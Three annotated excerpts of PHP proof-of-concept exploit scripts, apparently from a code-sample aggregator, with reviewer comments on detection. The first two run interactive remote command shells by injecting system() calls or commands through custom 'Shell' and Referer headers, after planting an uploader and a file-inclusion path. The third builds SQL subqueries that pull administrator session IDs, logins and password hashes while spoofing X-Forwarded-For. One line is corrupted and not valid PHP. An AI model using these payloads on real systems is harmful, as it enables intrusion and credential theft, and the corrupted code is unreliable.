Exemplo n.º 1
// NOTE(review): excerpt from the middle of a proof-of-concept script. $xpl (an
// HTTP client object), $url, $postdata, $mode and $all are set earlier in the
// file and are not visible here.
//
// Submits a prepared form body to the application's configuration page
// (page=configuration&op=modify). Whether this request carries an admin
// session is not visible in this excerpt. On the application side, this
// endpoint should require an authenticated admin session and reject any
// other request.
$xpl->post($url . '?page=configuration&op=modify', $postdata);
print "done\n";
$success = true;
if ($mode == 0) {
    // Mode 0: a single GET carrying a custom "upload: 1" request header. The
    // step counts as successful only when the response body contains
    // "upfiledone" (case-insensitive).
    // Detection: a non-standard "upload" request header and the "upfiledone"
    // response marker are both usable log/IDS indicators.
    print " * loading uploader\t";
    $xpl->addheader("upload", "1");
    if (preg_match("#upfiledone#i", $xpl->get($url))) {
        print "done\n";
    } else {
        $success = false;
        print "error\n";
    }
} else {
    // Any other mode: interactive loop that ends when the operator types
    // "quit" or "exit". Each STDIN line is wrapped in a PHP system('...') call
    // and sent as the value of a custom "Shell" request header; the part of
    // the response after the first "123456789" marker is printed back.
    // Detection: a request header named "Shell" whose value is PHP source is a
    // strong indicator of compromise; so is "123456789" framing in responses.
    // The server-side code that evaluates the header is not in this excerpt —
    // presumably planted by an earlier step; confirm against the full script.
    print "\n\$shell> ";
    while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
        // reset('header') is called before each request — presumably clears
        // previously added headers; the client class is not shown.
        $xpl->reset('header');
        $xpl->addheader('Shell', "system('{$cmd}');");
        $xpl->get($url);
        $data = explode('123456789', $xpl->getcontent());
        print $data[1] . "\n\$shell> ";
    }
}
/* Reinitialize website name and homepage and erase user avatar */
print " * repairing homepage\t";
// NOTE(review): this request uses a hard-coded host instead of $url, so as
// written it always goes to that host regardless of the configured target —
// looks like a leftover from the author's own testing.
$xpl->get('http://myannu.fr/?page=avatars&op=delete&id=1&mode=J');
// Form body that writes the site configuration back (site name from $all['1'],
// site URL from $url, default theme/logo). For incident response: restored
// settings plus a deleted avatar mean the visible configuration may look
// untouched afterwards, so rely on request logs rather than current settings.
// NOTE(review): the line below is corrupted in this listing. The string is
// closed by "******", which looks like a credential scrubber on the hosting
// page, and whatever followed (presumably the POST of $postdata and a
// print "done\n") has been swallowed. As shown it is not valid PHP.
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=accueil&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
if ($success) {
    // Reports the location of a file named "w00t.php" directly under $url.
    // An unexpected file of that name in the web root is a file-system
    // indicator to search for during triage.
    print "\n * uploader: " . $url . "w00t.php\n";
}
Exemplo n.º 2
// NOTE(review): excerpt from the middle of a proof-of-concept script. $xpl (an
// HTTP client object), $url, $name and possibly $avatarur are set earlier in
// the file and are not visible here.
//
// Takes the first <option value='...'> found in the previous response as the
// style name and falls back to "xml_BlueLight" when none is found.
if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) {
    $styles[1] = "xml_BlueLight";
}
// Creates a forum through myadmin.php, using $name as both title and filename
// and an empty passwd field. Whether this request is authenticated is not
// visible here. On the application side, a caller-chosen filename should not
// end up as a server-side script name (see the request to "{$name}.php" below).
$xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject=");
// Re-reads the admin listing and collects every id that appears in a
// "hide_forum" link; the script stops if none is found.
$xpl->get($url . 'myadmin.php?choix=1');
if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) {
    die("\nsploit> Can't retrieve the forum id");
}
// The last id in the listing is used — presumably the forum just created.
$forumid = $fid[1][count($fid[1]) - 1];
// Issues the hide_forum action for that id.
$xpl->get($url . "myadmin.php?choix=1&action=hide_forum&id={$forumid}");
print "\nsploit> Done\nstatus> Trying to include the picture\n\$shell> ";
// Defaults to an avatar image named after $name when no path was supplied.
if (empty($avatarur)) {
    $avatarur = "./avatar/{$name}.jpg";
}
// Stores the avatar path in the forum's PARAM[top_url] setting. Going by the
// status message above, the application later include()s that path, i.e. a
// file-inclusion flaw fed by a stored setting — inferred, since the server
// code is not shown. Mitigation: never include() a path taken from stored or
// user-supplied settings, and serve uploaded images from a location where
// they cannot be interpreted as PHP.
$xpl->post($url . "myadmin.php?action=rec_perso&id={$forumid}&choix=3", "PARAM%5Btop_url%5D={$avatarur}");
$xpl->reset();
// Interactive loop that ends when the operator types "quit" or "exit". Each
// STDIN line is sent as the Referer header of a GET to "{$name}.php", and the
// part of the response after the first "337666733" marker is printed back.
// Detection: Referer values that are not URLs on requests to a recently
// created .php file, and "337666733" framing in response bodies.
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    $xpl->addheader("Referer", $cmd);
    $xpl->get($url . $name . '.php');
    $data = explode("337666733", $xpl->getcontent());
    print $data[1] . "\n\$shell> ";
}
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
Exemplo n.º 3
    }
    $queries = array();
    $queries[] = array("     SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1");
    $queries[] = array("     UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array("   Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $xpl->agent("Mozilla Firefox");
    $xpl->addheader("X-Forwarded-For", "127.0.0.1");
    $ctmp = $xpl->get($url . "index.php?file=Stats&page=visits");
    if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) {
        exit("[*] You don't have rights to access Stats page.\n");
    }
    if (preg_match('#<a href="index.php\\?file=User&amp;op=login_screen">[^<]+</a> | <a href="index.php\\?file=User&amp;op=reg_screen">[^<]+</a>#i', $ctmp)) {
        exit("[*] You must be registered, use -user param.\n");
    }
    $xpl->reset("header");
    $xpl->agent("Mozilla Firefox");
    attack1();
    attack2();
}
function getparam($param, $opt = '')
{
    global $argv;
    foreach ($argv as $value => $key) {
        if ($key == '-' . $param) {
            return $argv[$value + 1];
        }
    }
    if ($opt) {
        exit("\n-{$param} parameter required");
    } else {